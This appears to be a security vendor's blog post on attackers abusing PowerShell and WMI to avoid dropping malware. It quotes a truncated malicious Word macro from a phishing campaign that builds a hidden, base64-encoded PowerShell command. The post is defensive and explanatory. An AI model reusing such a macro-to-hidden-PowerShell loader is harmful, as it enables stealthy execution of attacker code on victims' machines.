As defensive technologies improve and defenders get better at identifying unusual processes and binaries on their endpoints, attackers, too, adjust their techniques, work harder and become more creative to be as sneaky as possible in order to stay under the radar.
With so many solutions these days focused on malware and identification of malicious code, attackers are finding ways to operate without downloading tools and backdoors. Increasingly, attackers are leveraging the tools already on the box and finding new and creative ways to employ them in the pursuit of their goal. This has often been referred to as “living off the land,” and it’s often extremely difficult to uncover attacks of this nature.
There are two tools present on most every Windows system that are powerful and versatile enough to accomplish most anything an adversary would need to achieve their goals: PowerShell and Windows Management Instrumentation (WMI).
By now, everyone has probably heard of the risks involving PowerShell and how attackers are increasingly targeting it for abuse. There has been a lot written about PowerShell and how to leverage it for attacks. The Carbon Black Threat Research Team has recently discovered a new family of ransomware, which we dubbed “PowerWare,” that targets organizations via Microsoft Word and PowerShell.
There are even frameworks built around PowerShell to facilitate its use as an attack tool – complete with scripts to execute remote code in the context of PowerShell, do your recon for you, and establish persistence mechanisms.
Here is a snippet from a malicious macro embedded in a word doc used in an actual phishing campaign –
Public Function Decrypt_Document() As Variant
Dim Str As String
Str = “powershell.exe -NoP -NonI -W Hidden -Enc JABXAEMAP”
Str = Str + “QBOAEUAdwAtAE8AQgBqAGUAQwB0ACAAUwB5AFMAdABFAG0ALgB”
Str = Str + “OAEUAdAAuAFcARQBiAEMATABpAGUAbgBUADsAJAB1AD0AJwBNA”
Str = Str + “G8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHM”
This macro builds a long PowerShell command that it will then execute. This is a common tactic for executing malicious code without having to download a binary image. The script is passed to PowerShell via the command line, and is base64 encoded which will bypass PowerShell’s execution policy by default. This encoded script could do recon and send data back, establish some persistence, or even pull down additional PowerShell scripts and execute them. There are lots of possibilities for bad guys here. This is just one simple example of how attackers use PowerShell, but it is a very common one.
(Be sure to see Carbon Black’s recent threat alert on “PowerWare,” ransomware written in PowerShell, that is targeting 0rganizations via Microsoft Word.)
Windows Management Instrumentation (WMI) is a Windows framework that has been around since the NT days, although it never really seemed to take off. It’s actually PowerShell that really opened up WMI and made it accessible. The combination of WMI and PowerShell is very powerful, and by manipulating WMI via PowerShell, you can accomplish just about anything on the box. WMI also facilitates lateral movement via Windows Remote Management (WinRM), which allows access to WMI interfaces on remote systems. This is the same mechanism that PowerShell remoting uses.
At BlackHat, Matthew Graeber gave an excellent talk on using WMI to do lots of evil stuff, including creating a persistent backdoor that can be done without introducing any additional binaries to the system. A whitepaper describing the technique is available here. I highly suggest giving it a read to better understand the power available to attackers without needing to execute any “malware.”
Advanced Threat Feed Updates
To help counter some of these attacks, we added several queries to the Carbon Black Advanced Threats feed that look for some tells that PowerShell and WMI are being abused in the environment. The capability of Carbon Black Enterprise Response to look for specific command lines enables us to catch some of these activities that would otherwise be extremely difficult to identify. While we can’t capture all of the possible ways that a malicious actor might leverage these tools, it gives a good base of coverage.
As sophisticated adversaries increasingly work to avoid the filesystem and generate as few observables on the system as possible, these types of techniques will only increase in use. While there are a lot of technologies out there to try to identify “malware,” it’s important to remember what can be accomplished by a motivated adversary without it.
Malware is just one more tool to help the adversary, but typically everything needed for an adversary to get what they’re after is already there waiting for them.